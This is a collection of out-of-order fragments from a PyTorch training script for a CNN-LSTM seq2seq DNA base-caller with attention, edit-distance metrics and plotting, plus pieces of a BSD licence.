"parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides",
"= self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target",
"2) self.linear = nn.Linear(self.hidden_dim*2, self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim",
"print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(),",
"# seq_length x batch_size x out_size return out_decoder, labels_sorted, sorted_len_target # In[ ]:",
"# Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index",
"layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout)",
"if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim",
"print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1))",
"get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len,",
"ed2 = ed # else: # ed = 0 # ed2 = old_ed",
"data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them in",
"bias in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\",",
"= y[not_padded_batches, :, i] # batch-i, features, seq len y = y[not_padded_batches, :,",
"running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train =",
"split_LSTMbiases = False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len)))",
"= args.forget_bias_decoder num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout =",
"self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout",
"of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim] #",
"# running_editd_train += ed # editd_iteration.append(ed2) # print(\"edit distance= {0:.4f}\".format((epoch_editd / float(iteration +",
"set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit",
"= open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal",
"val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer,",
"hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias",
"LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF",
"labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting",
"length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder =",
"activation\", \"out gate\"]): i += 1 ax = fig.add_subplot(2, 2, i) for epoch",
"const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l',",
"G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir +",
"set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000,",
"and len(true_y_len) > 1: not_padded_batches = i < true_y_len # get indices of",
"np.linalg.norm(m[start: end], ord=2) # cell gate start, end = n//2, n//2 + n//4",
"dict_activations_in = {} dict_activations_forget = {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder",
"initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def",
"token as next input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port)",
"= ecoder_output[sorted_idx_target, :, :] # sort labels so that they match with order",
"{} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 = {}",
"running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g",
"in binary form must reproduce the above copyright notice, this list of conditions",
"self.port = port def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in",
"signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val,",
"== 0: # ed = np.mean(np.array(convert_to_string(output.argmax(2), sorted_labels, sorted_labels_len))) # ed2 = ed #",
"#writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] =",
"train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set = [val_set[0].cuda(port), val_set[1].cuda(port), val_set[2].cuda(port), val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train:",
"default=False) return parser # Network # ----------- # * CNN-Encoder # * LSTM-Encoder",
"own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim =",
"the LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo",
"acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:])",
"= input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim =",
"lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder = lstm_decoder assert",
"[\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i += 1 ax =",
"= 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) >",
"forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2,",
"1)), \"Val Accuracy: {:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100)",
"dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels = CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels,",
"= (seq*batch, out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val",
"= fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation",
"pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0],",
"for b in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases",
"layer if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1)",
"= input_decoder # [max. target length, batch size, output dim] top1 = input_decoder.argmax(1)",
"def get_train_loader_trainVal(tensor_x, sig_len, tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len,",
"nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the output _, original_idx",
"3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit",
"bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder = CNN, lstm_encoder = lstm, lstm_decoder",
"in Decoder-LSTM\") parser.add_argument(\"--bi_lstm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda",
"in name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n =",
"descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1",
"def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2:",
"max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation",
"n_epochs) print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is",
"in model.parameters() if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\"",
"hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\" * 100)",
"dropout_input = args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD",
"source code must retain the above copyright notice, this list of conditions and",
"p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x",
"# this locator puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0,",
"self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll",
"type=int, default=500, help=\"Number of epochs\") parser.add_argument('-v', '--make_validation', type=int, default=1000, help=\"Make every n updates",
":, :] else: label = y[:, :, i] # batch, features, seq len",
"ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE",
"forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001,",
"args.learning_rate editD = args.editD sgd = False out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED)",
"= lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output",
"not teacher_force = random.random() < teacher_forcing_ratio # put on position: seq, 0:true_batch_size, features",
"SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on,",
"ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as",
"wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))), label=\"training error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\")",
"n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start, end",
"lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\" assert lstm_encoder.batch_size ==",
"edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\")",
"float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val + 1)), \"Val",
"batch_first=True) def init_hidden(self): # This is what we'll initialise our hidden state as",
"= {} dict_gradients = {} running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train =",
"h.view(h.size(0), -1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings",
"length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\")",
"# get only batches that are NOT padded h = hidden[0][:, not_padded_batches, :]",
"early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0 epoch_acc",
"running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration)",
"earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes,",
"feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim] lstm_in_unroll",
"F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden:",
"batch_size, hidden_dim). # Sort instances by sequence length in descending order #print(\"in length\",",
"help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float,",
"input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] =",
"= sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not padded elements",
"Calculate cross entropy loss # output = (seq*batch, out dim), target = (seq*batch)",
"from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input,",
"encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] # batch,",
"= args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout # CNN",
"print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(),",
"batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end =",
"input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]),",
"parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\")",
"= hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h",
"2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def",
"= args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\"",
"= args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input",
"intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else:",
"= data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val =",
"len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\" in",
"lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The",
"val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe",
"= {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder =",
"heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing",
"f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with",
"LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio,",
"ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()),",
"create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0:",
"true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len # get indices",
"self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden,",
"CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm =",
"= args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD =",
"= editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars def",
"script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" + infile",
"5 # indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss",
"len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]),",
"unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx,",
"CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY",
":] else: label = y[:, :, i] # batch, features, seq len if",
"ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch % print_epoch",
"%\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax = fig.add_subplot(1,",
"get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader =",
"print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not",
"if val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val =",
"in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0]",
"in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\",",
"(batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going to use teacher",
"current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break",
"script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set =",
"LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on",
"{0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd",
"plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3,",
"super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h =",
"4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters()",
"= False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train],",
"plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is",
"is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder =",
"import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import",
"provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of",
"= criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index,",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def",
"type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of",
"-1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates",
"dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else:",
"np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val =",
"above copyright notice, this list of conditions and the following disclaimer in the",
"dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use",
"super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers =",
"# and matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1))",
", :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :]",
"> int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) >",
"use in source and binary forms, with or without modification, are permitted provided",
"output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of",
"and \"lstm\" in p and \"linear\" not in p: n = matrix_param[p].shape[0] #",
"= args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir",
"typically chosen between 1 and a few hundreds, e.g. [batch size] = 32",
"input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k])",
"layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels",
"labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size,",
"Range(object): def __init__(self, start, end): self.start = start self.end = end def __eq__(self,",
"IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy",
"outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer =",
"cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start",
"= outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module):",
"# A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out",
"x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4)",
"parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs,",
"self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1)",
"class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size",
"/ float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0",
"cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4 #",
"end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end)",
"in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?',",
"lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS",
"output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens",
"hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient",
"seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR",
"torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch =",
"val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2]",
"data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val",
"ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs.",
"= unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder # ----------- class",
"matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start:",
"type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget",
"n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start,",
"max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best",
"the sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True)",
"sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname,",
"outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate) hy",
"encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] #",
"tensor_y, sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0,",
"float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration)",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0,",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))),",
"const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout",
"DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS",
